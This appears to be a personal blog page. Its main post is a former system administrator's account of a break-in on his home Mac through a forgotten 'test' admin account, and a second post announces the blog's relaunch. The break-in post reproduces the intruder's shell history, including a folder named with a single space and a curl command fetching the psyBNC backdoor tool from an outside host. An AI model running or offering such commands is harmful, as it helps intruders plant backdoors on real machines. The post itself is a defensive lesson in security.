The Break-in

The Scary Door by musicalwds

I am so ashamed.

I was once a system & network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I’ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that my home desktop Mac was broken into. Yep. I had enabled remote logins through my firewall, which is innocent enough, but during a fit of debugging some USB problems, I set up new user named “test” with a password of .. you guessed it. I remember at the time thinking “don’t pick ‘test’ as a user name, and certainly don’t use it as the password” but I was in a hurry and I did it anyway. I finished my debugging, but forgot about the account.

Oh, and of course, I set it up with full administrator privileges.

Tonight I’m poking through my log files (I’m still debugging for the source of this USB error on my system, it’s driving me nuts), and I notice that some scanning software came by today, trying to log into zillions of accounts. I was smugly scrolling through the list of user names it was trying until I got to “test” and … it didn’t log in. It didn’t know the password. I first thought, holy crap, I left that account enabled. Then I thought, how could it not guess the password?

The reason: because somebody else had, three days ago. And changed it.

I brought up a Terminal window, and typed “last test” which gives me a list of the previous logins. Sure enough, some fine program/human had logged in to my system three days ago, and stayed for 1 minute. So I went to the “test” home directory, where I conveniently found a list of what happened when they logged in:

1. w
2. passwd
3. uname -a
4. exit
5. cd /var/tmp
6. mkdir " "
7. cd " "
8. curl -O geocities.com/myhael_ilie/psyd,tar.gz
9. curl -O geocities.com/myhael_ilie/psyd,tar.gz
10. exit

Translation:

  1. See who’s on.
  2. Change the password for user “test”.
  3. See what kind of system this is.
  4. Logout.
  5. Go to a folder commonly used for temporary files.
  6. Create a folder named ” ” (just a single space).
  7. Change to that folder.
  8. Download a file from the web.
  9. Try the download again.
  10. Give up, and log out.

So why did the curl commands fail? It’s because I use Little Snitch, which asks my permission every time a random command tries to access the Internet. Since I wasn’t at the computer at the time, I never gave my OK, and Little Snitch prevented the ‘curl’ from working. The person would have seen this:

curl: (7) Failed to connect to 66.218.77.68: Host is down

So what was in psyd,tar.gz? Well, actually it’s a typo. The real name doesn’t have a comma in it, but the person who logged in didn’t notice the mistake because of the “host is down” message. I grabbed the correct file and took a look at it. It is psyBNC, an “IRC bouncer”, but can be used to install backdoors and other nastiness. The file contains the complete source code, as well as a fully-functioning Mac executable.

Fortunately, that’s the end of the story. Several lessons here, ones which I’ve told others far too many times:

  1. Do what you can to prevent break-ins.
  2. Log everything so you can figure out how the inevitable break-in happened.
  3. Convenience is often at the expense of security

I was incredibly lucky. A simple sudo bash would have given this person root access, and they could have erased everything on my system, or worse. In fact, they could have, and then erased all traces of what they did, but I have enough logging and checks to know that they didn’t do anything but what’s described above.

I humbly admit all of this in the hope that you can learn from my near miss.

And yes, I removed the “test” account.

The Break-in

Resurfacing

Well, it’s hockey playoff season, so that means it’s time to resurface the blog.

 Zamboni Model700

OK, that doesn’t make any sense, but I wanted to say something about hockey, so there you go.

Yes, I really am resurfacing the blog– upgraded the software and put in a fresh coat of paint. I intend to consolidate a few old blogs and assorted posts from the past; there’s a pile of stuff from Ye Olden Days that will eventually make its way here.

While I’m not a fan of revisionist blogging, I’ve cleaned up some of the old posts (broken links) and deleted a few posts that made no sense – e.g. they were too time-based to be of even token value now.

The New and Improved site is being watched by Google, because I’m sending web bugs beacons back to Google Analytics. I’m also publishing the feed through Feedburner, which provides its own set of (rather weak) stats.

For you RSS readers, no big changes, except that the whole feed got refreshed with the software changes. Oops.

So what’s the story? Simple. I got crazy busy, and blogging fell below the line. Not just writing — reading did too. Months ago, a colleague mentioned that he’s more interesting when he reads blogs. I’ve started reading again, but if there’s a correlation between amount of reading and interestingness, I’m still not very interesting. But since being interesting has never stopped me from blogging, I say Game On!

Resurfacing